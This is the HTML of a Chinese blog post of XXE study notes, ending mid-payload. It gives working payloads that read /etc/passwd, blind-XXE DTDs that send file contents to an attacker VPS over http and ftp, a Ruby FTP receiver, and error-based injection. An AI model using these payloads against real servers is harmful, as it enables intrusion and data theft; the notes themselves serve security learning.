<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="XXE"><meta name="keywords" content="XXE"><meta name="author" content="mlccs,undefined"><meta name="copyright" content="mlccs"><title>XXE【!&gt;-_-&lt;!】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!-- link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!-- link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!-- script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><!-- script(src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML")--><script src="/js/mathjax/mathjax.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
    tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
});
</script><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"S6Y49E5I4K","apiKey":"8c221da4a00bc9951e60cd14527148e3","indexName":"git_BLOG","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  gitment: ,
  valine: ,
}</script><meta name="generator" content="Hexo 5.4.0"></head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XML%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text">XML基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E5%AE%9E%E4%BD%93"><span class="toc-number">1.1.</span> <span class="toc-text">字符实体</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E5%90%8D%E5%AE%9E%E4%BD%93"><span class="toc-number">1.2.</span> <span class="toc-text">命名实体</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93"><span class="toc-number">1.3.</span> <span class="toc-text">外部实体</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93"><span class="toc-number">1.4.</span> <span class="toc-text">参数实体</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E4%BD%93%E5%B5%8C%E5%A5%97"><span class="toc-number">1.5.</span> <span class="toc-text">实体嵌套</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8D%8F%E8%AE%AE%E6%94%AF%E6%8C%81"><span class="toc-number">1.6.</span> <span class="toc-text">协议支持</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="toc-number">2.</span> <span class="toc-text">读取文件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E8%AF%BB%E6%96%87%E4%BB%B6"><span class="toc-number">2.1.</span> <span class="toc-text">外部实体读文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93%E8%AF%BB%E6%96%87%E4%BB%B6"><span class="toc-number">2.2.</span> <span class="toc-text">参数实体读文件</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#XXE%E7%9B%B2%E6%B3%A8"><span class="toc-number">3.</span> <span class="toc-text">XXE盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E5%BD%A2%E5%BC%8F"><span class="toc-number">3.1.</span> <span class="toc-text">基本形式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A6%81%E7%82%B91"><span class="toc-number">3.2.</span> <span class="toc-text">要点1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A6%81%E7%82%B92"><span class="toc-number">3.3.</span> <span class="toc-text">要点2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A6%81%E7%82%B93"><span class="toc-number">3.4.</span> <span class="toc-text">要点3</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Ftp%E5%8D%8F%E8%AE%AE%E8%AF%BB%E6%96%87%E4%BB%B6"><span class="toc-number">4.</span> <span class="toc-text">Ftp协议读文件</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A4%96%E9%83%A8DTD%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">5.</span> <span class="toc-text">外部DTD报错注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E9%83%A8%E5%8F%82%E6%95%B0%E5%AE%9E%E4%BD%93%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">6.</span> <span class="toc-text">内部参数实体报错注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BC%95%E7%94%A8%E6%9C%AC%E5%9C%B0DTD"><span class="toc-number">7.</span> <span class="toc-text">引用本地DTD</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E6%89%BE%E5%88%B0%E8%BF%99%E4%B8%AA%E5%86%85%E9%83%A8-DTD"><span class="toc-number">7.1.</span> <span class="toc-text">如何找到这个内部 DTD</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E9%83%A8%E5%AE%9E%E4%BD%93%E5%A3%B0%E6%98%8E%E4%B8%AD%E5%BC%95%E7%94%A8%E5%AE%9E%E4%BD%93%E5%8F%82%E6%95%B0"><span class="toc-number">8.</span> <span class="toc-text">内部实体声明中引用实体参数</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%A4%84%E7%90%86%E5%BC%95%E8%B5%B7%E7%9A%84-XXE"><span class="toc-number">9.</span> <span class="toc-text">特殊文件上传处理引起的 XXE</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">10.</span> <span class="toc-text">命令执行</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#WAF%E7%BB%95%E8%BF%87"><span class="toc-number">11.</span> <span class="toc-text">WAF绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E9%94%AE%E8%AF%8D%E8%A2%AB%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">11.1.</span> <span class="toc-text">关键词被过滤绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#html%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">11.2.</span> <span class="toc-text">html实体编码绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#data-%E5%8D%8F%E8%AE%AE%E7%BB%95%E8%BF%87"><span class="toc-number">11.3.</span> <span class="toc-text">data:&#x2F;&#x2F;协议绕过</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E6%A1%A3"><span class="toc-number">12.</span> <span class="toc-text">参考文档</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">mlccs</div><div class="author-info-description"></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">4</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">4</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">3</span></a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">!&gt;-_-&lt;!</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">XXE</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2021-08-04 | 更新于 2021-08-04</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/WEB/">WEB</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/XXE/">XXE</a></div></div></div><div class="main-content"><h1 id="XML基础"><a href="#XML基础" class="headerlink" title="XML基础"></a>XML基础</h1><h2 id="字符实体"><a href="#字符实体" class="headerlink" title="字符实体"></a>字符实体</h2><p>字符实体类似html中的实体编码，形如：&amp;#97;（十进制）或者&amp;#x61;（十六进制）</p>
<h2 id="命名实体"><a href="#命名实体" class="headerlink" title="命名实体"></a>命名实体</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">foo</span> [</span></span><br><span class="line"><span class="meta">  <span class="meta">&lt;!ENTITY <span class="meta-keyword">testref</span> <span class="meta-string">&quot;testrefvalue&quot;</span>&gt;</span> &lt;!-- 直接定义实体值 --&gt;</span></span><br><span class="line"><span class="meta">  ]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">somexml</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">message</span>&gt;</span><span class="symbol">&amp;testref;</span><span class="tag">&lt;/<span class="name">message</span>&gt;</span>  <span class="comment">&lt;!-- 解析器将会用 testrefvalue 代替&amp;testref; --&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">somexml</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="外部实体"><a href="#外部实体" class="headerlink" title="外部实体"></a>外部实体</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">foo</span> [</span></span><br><span class="line"><span class="meta">	<span class="meta">&lt;!ENTITY <span class="meta-keyword">xxe</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///window/win.ini&quot;</span>&gt;</span>   &lt;!-- 使用了SYSTEM关键字 --&gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">somexml</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">message</span>&gt;</span><span class="symbol">&amp;xxe;</span><span class="tag">&lt;/<span class="name">message</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">somexml</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="参数实体"><a href="#参数实体" class="headerlink" title="参数实体"></a>参数实体</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">foo</span> [</span></span><br><span class="line"><span class="meta">	<span class="meta">&lt;!ENTITY %xxe <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///window/win.ini&quot;</span>&gt;</span>   </span></span><br><span class="line"><span class="meta">	%xxe;				&lt;!-- 参数实体需要在实体名前加百分号，且只能在DTD中使用，另外，参数实体允许实体嵌套 --&gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">somexml</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">message</span>&gt;</span>asd<span class="tag">&lt;/<span class="name">message</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">somexml</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="实体嵌套"><a href="#实体嵌套" class="headerlink" title="实体嵌套"></a>实体嵌套</h2><p>​        参数实体允许嵌套，内层的定义的参数实体% 需要进行HTML转义，否则会出现解析错误。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE a&gt;</span> [</span><br><span class="line">    <span class="meta">&lt;!ENTITY % b <span class="meta-string">&quot;&lt;!ENTITY b1 &quot;</span>awsl<span class="meta-string">&quot;&gt;&quot;</span>&gt;</span></span><br><span class="line">    %b;</span><br><span class="line">]&gt;</span><br><span class="line"><span class="tag">&lt;<span class="name">a</span>&gt;</span>&amp;b1<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"></span><br><span class="line">输出结果：</span><br><span class="line"><span class="comment">&lt;!-- awsl --&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="协议支持"><a href="#协议支持" class="headerlink" title="协议支持"></a>协议支持</h2><p>​        各语言中XML文档加载外部实体时支持的协议如下表</p>
<table>
<thead>
<tr>
<th align="center"></th>
<th align="center"></th>
<th align="center"></th>
<th align="center"></th>
</tr>
</thead>
<tbody><tr>
<td align="center">LIBXML2</td>
<td align="center">PHP</td>
<td align="center">JAVA</td>
<td align="center">.NET</td>
</tr>
<tr>
<td align="center">file</td>
<td align="center">file</td>
<td align="center">http</td>
<td align="center">file</td>
</tr>
<tr>
<td align="center">http</td>
<td align="center">http</td>
<td align="center">https</td>
<td align="center">http</td>
</tr>
<tr>
<td align="center">ftp</td>
<td align="center">ftp</td>
<td align="center">ftp</td>
<td align="center">https</td>
</tr>
<tr>
<td align="center"></td>
<td align="center">php</td>
<td align="center">file</td>
<td align="center">ftp</td>
</tr>
<tr>
<td align="center"></td>
<td align="center">compress.zlib</td>
<td align="center">jar</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">compress.bzip2</td>
<td align="center">netdoc</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">data</td>
<td align="center">mailto</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">glob</td>
<td align="center">gopher</td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center">phar</td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<h1 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h1><h2 id="外部实体读文件"><a href="#外部实体读文件" class="headerlink" title="外部实体读文件"></a>外部实体读文件</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">readfile</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">reset</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">login</span>&gt;</span><span class="symbol">&amp;readfile;</span><span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">secret</span>&gt;</span>Any bugs?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">reset</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="参数实体读文件"><a href="#参数实体读文件" class="headerlink" title="参数实体读文件"></a>参数实体读文件</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">readfile</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">%readfile;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">reset</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">login</span>&gt;</span>bee<span class="tag">&lt;/<span class="name">login</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">secret</span>&gt;</span>Any bugs?<span class="tag">&lt;/<span class="name">secret</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">reset</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>参数实体加载到的内容是要被当作DTD解析的，如果内容不符合DTD语法就会报错，并不适合直接读文件，各语言在报错的时候暴露的内容也不一样</p>
<p><img src="XXE.assets/image-20210725212547697.png" alt="image-20210725212547697"></p>
<h1 id="XXE盲注"><a href="#XXE盲注" class="headerlink" title="XXE盲注"></a>XXE盲注</h1><h2 id="基本形式"><a href="#基本形式" class="headerlink" title="基本形式"></a>基本形式</h2><p>​        有时候XXE注入点没有回显，此时可以利用参数实体将读取到的文件通过http/ftp等协议发送出去</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY % <span class="meta-keyword">file</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY % <span class="meta-keyword">dtd</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://&lt;vps-addr&gt;/evil.dtd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">    %dtd;</span></span><br><span class="line"><span class="meta">    %send;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>​        evil.dtd内容为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % payload &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#x27;http://&lt;vps-addr&gt;/?content=%file;&#x27;&gt;&quot;&gt;</span><br><span class="line">%payload;</span><br></pre></td></tr></table></figure>

<p>​        必须加载外部dtd并且evil.dtd中必须使用嵌套方式定义发送文件的实体</p>
<h2 id="要点1"><a href="#要点1" class="headerlink" title="要点1"></a>要点1</h2><p>为什么要从外部加载dtd文件来发送文件，直接读取文件然后发送不行吗？不行<br><img src="XXE.assets/image-20210725215222657.png" alt="image-20210725215222657"></p>
<p>报错：PEReferences(Parameter-entity) forbidden in internal subset in Entity<br>原因：DTD<a target="_blank" rel="noopener" href="https://www.w3.org/TR/xml/#wfc-PEinInternalSubset">规则</a> 定义了在DTD内部子集中，参数实体的引用不允许在标记声明里，而在外部DTD中，是可以的。</p>
<h2 id="要点2"><a href="#要点2" class="headerlink" title="要点2"></a>要点2</h2><p>外部dtd中实体payload的定义里%为什么编码为&amp;#x25;</p>
<p>%不允许出现在Entity的value中. 所以需要将%进行Unicode编码为&amp;#x25;。在xml中Unicode编码与字符本身是一样的</p>
<h2 id="要点3"><a href="#要点3" class="headerlink" title="要点3"></a>要点3</h2><p>为什么非要做实体的嵌套，而不能像下边这样？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % send SYSTEM &quot;http://192.168.51.150/&amp;#x25;file;&quot;&gt;</span><br><span class="line">%send;</span><br></pre></td></tr></table></figure>

<p><img src="XXE.assets/image-20210725220955444.png" alt="image-20210725220955444"></p>
<p>报错：发现直接声明参数实体send然后引用%send; , 结果就是%file;没有被解析<br>原因：所以需要在外面包一个参数实体int的声明，<code>%int;</code>引用的时候%file;会被成功解析，然后在%send;就可以成功的将解析<code>%file;</code>的内容传出。所以<code>%int</code>只是辅助的作用，用于辅助解释send实体内容。</p>
<p>这个问题还不是很清楚，再说</p>
<h1 id="Ftp协议读文件"><a href="#Ftp协议读文件" class="headerlink" title="Ftp协议读文件"></a>Ftp协议读文件</h1><p>​        在java，.net等程序中没有php://filter/read=convert.base64-encode/resource=php://input这样的工具，导致使用http协议发送文件内容时由于换行符的存在而失败。所以如果要读取换行的文件，一般使用FTP协议。FTP服务器脚本如下</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">&#x27;socket&#x27;</span></span><br><span class="line">server = TCPServer.new <span class="number">33</span>       <span class="comment"># 33为ftp端口号，可自行更改</span></span><br><span class="line">loop <span class="keyword">do</span></span><br><span class="line">  Thread.start(server.accept) <span class="keyword">do</span> <span class="params">|client|</span></span><br><span class="line">    puts <span class="string">&quot;New client connected&quot;</span></span><br><span class="line">    data = <span class="string">&quot;&quot;</span></span><br><span class="line">    client.puts(<span class="string">&quot;220 xxe-ftp-server&quot;</span>)</span><br><span class="line">    loop &#123;</span><br><span class="line">        req = client.gets()</span><br><span class="line">        puts <span class="string">&quot;&lt; &quot;</span>+req</span><br><span class="line">        <span class="keyword">if</span> req.<span class="keyword">include</span>? <span class="string">&quot;USER&quot;</span></span><br><span class="line">            client.puts(<span class="string">&quot;331 password please - version check&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">           <span class="comment">#puts &quot;&gt; 230 more data please!&quot;</span></span><br><span class="line">            client.puts(<span class="string">&quot;230 more data please!&quot;</span>)</span><br><span class="line">        <span class="keyword">end</span></span><br><span class="line">    &#125;</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>

<p>​        外部DTD——evil.xml的内容如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;</span><br><span class="line">&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#37; send SYSTEM &#x27;ftp://&lt;vps-ftp-addr&gt;/%file;&#x27;&gt;&quot;&gt;</span><br><span class="line">%int;</span><br><span class="line">%send;</span><br></pre></td></tr></table></figure>

<p>​        客户端请求的payload如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://&lt;vps-addr&gt;/evil.xml&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">%remote;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br></pre></td></tr></table></figure>

<p>但实际测试的时候一直不成功，虽然服务端请求了远程dtd但ftp请求并未发出,由于换行等特殊符号的存在依旧报错</p>
<p><img src="XXE.assets/image-20210726003550057.png" alt="image-20210726003550057"></p>
<p><img src="XXE.assets/image-20210726003621861.png" alt="image-20210726003621861"></p>
<h1 id="外部DTD报错注入"><a href="#外部DTD报错注入" class="headerlink" title="外部DTD报错注入"></a>外部DTD报错注入</h1><p>有时候服务器虽然可以出网，但打payload时由于读取的文件中含有一些特殊符号，在java，.net等程序中又没有php://filter/read=convert.base64-encode/resource=php://input这样的工具，导致使用http或ftp协议发送文件内容时常常失败，而报错注入则不存在此类问题</p>
<p>VPS上放置test.dtd，内容如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;</span><br><span class="line">&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#x25; aerr SYSTEM &#x27;file:///getaerror/%file;&#x27;&gt;&quot;&gt;</span><br><span class="line">%int;</span><br><span class="line">%aerr;</span><br></pre></td></tr></table></figure>

<p>然后客户端发送xml请求进行利用</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">test</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://&lt;vps-addr&gt;/test.dtd&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">%test;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="XXE.assets/image-20210722173028563.png" alt="image-20210722173028563"></p>
<p>​        但是使用bwapp(PHP)测试时并不成功，是由于解析器不同导致</p>
<p><img src="XXE.assets/image-20210725234717352.png" alt="image-20210725234717352"></p>
<h1 id="内部参数实体报错注入"><a href="#内部参数实体报错注入" class="headerlink" title="内部参数实体报错注入"></a>内部参数实体报错注入</h1><p>​        对于不能出网的情况，也可以使用内部参数实体报错注入，payload如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; ?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">root</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY % <span class="meta-keyword">condition</span> <span class="meta-string">&#x27;</span></span></span></span><br><span class="line"><span class="meta-string"><span class="meta"><span class="meta">        &lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:///etc/passwd&quot;&gt;</span></span></span></span><br><span class="line"><span class="meta-string"><span class="meta"><span class="meta">        &lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;</span></span></span></span><br><span class="line"><span 